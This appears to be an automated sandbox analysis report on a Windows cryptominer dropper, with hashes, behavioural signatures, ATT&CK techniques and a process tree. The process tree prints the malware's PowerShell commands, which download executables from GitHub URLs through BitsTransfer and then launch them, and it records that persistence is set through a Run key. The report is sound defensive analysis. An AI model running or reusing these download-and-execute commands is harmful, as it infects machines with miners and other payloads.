Analysis

  • max time kernel
    97s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-08-2022 03:29

General

  • Target

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

  • Size

    8.3MB

  • MD5

    9ed9ad87a1564fbb5e1b652b3e7148c8

  • SHA1

    0c001b7e9615cbc22eac2a324d8deb7eaf069ff7

  • SHA256

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89

  • SHA512

    e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4852
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:848
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Start-Process lWr.exe; Start-Process ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4796

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    b6deac3351c943410eafe90bc93687c8

    SHA1

    34ff10b6e186ff6f7b6f39ebb127ee137ade5589

    SHA256

    1775d61fb6831a2c572bb51d5772952ee13bbee68bde0367546bb04811a70f0a

    SHA512

    3e025c20277dff003fe09afa2a9014d2fe42761bec935f7d7eb917ddb5b8760d5e3bc643e81d28fa7352c398cbdffcc0dbb5302e7fc6b97969387a3ef313b880

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    30d339889a9b66b417b5e46a2646506e

    SHA1

    d5089685d2ce69e2164987852d2094cfa5a28d50

    SHA256

    ba016ef41e7f4b9af9ea7673f085dbc6314b9b3aacd58f9875478cf450bf3a7e

    SHA512

    b4aa0858e3cf58edcf0157b67c45ede5d15dc8647e8f74430991d529f27a3e04e4c4f8822e2cdd66c4bc08f6593246f541d06cfe972e3ed46669c20ebfff8b4b

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • memory/848-142-0x0000000005FC0000-0x0000000005FE2000-memory.dmp
    Filesize

    136KB

  • memory/848-136-0x0000000004AC0000-0x0000000004AE2000-memory.dmp
    Filesize

    136KB

  • memory/848-137-0x0000000004D60000-0x0000000004DC6000-memory.dmp
    Filesize

    408KB

  • memory/848-138-0x0000000004DD0000-0x0000000004E36000-memory.dmp
    Filesize

    408KB

  • memory/848-139-0x0000000005A70000-0x0000000005A8E000-memory.dmp
    Filesize

    120KB

  • memory/848-140-0x0000000006A70000-0x0000000006B06000-memory.dmp
    Filesize

    600KB

  • memory/848-141-0x0000000005F40000-0x0000000005F5A000-memory.dmp
    Filesize

    104KB

  • memory/848-134-0x0000000002130000-0x0000000002166000-memory.dmp
    Filesize

    216KB

  • memory/848-143-0x00000000072D0000-0x0000000007874000-memory.dmp
    Filesize

    5.6MB

  • memory/848-144-0x0000000006E90000-0x0000000006EA4000-memory.dmp
    Filesize

    80KB

  • memory/848-135-0x0000000004EE0000-0x0000000005508000-memory.dmp
    Filesize

    6.2MB

  • memory/848-133-0x0000000000000000-mapping.dmp
  • memory/2696-130-0x0000000000000000-mapping.dmp
  • memory/4796-145-0x0000000000000000-mapping.dmp
  • memory/4796-148-0x0000000007740000-0x0000000007772000-memory.dmp
    Filesize

    200KB

  • memory/4796-149-0x000000006F670000-0x000000006F6BC000-memory.dmp
    Filesize

    304KB

  • memory/4796-150-0x0000000007700000-0x000000000771E000-memory.dmp
    Filesize

    120KB

  • memory/4796-151-0x00000000088A0000-0x0000000008F1A000-memory.dmp
    Filesize

    6.5MB

  • memory/4796-152-0x0000000007910000-0x000000000791A000-memory.dmp
    Filesize

    40KB

  • memory/4796-153-0x0000000007AC0000-0x0000000007ACE000-memory.dmp
    Filesize

    56KB

  • memory/4796-154-0x0000000007B10000-0x0000000007B2A000-memory.dmp
    Filesize

    104KB

  • memory/4796-155-0x0000000007B00000-0x0000000007B08000-memory.dmp
    Filesize

    32KB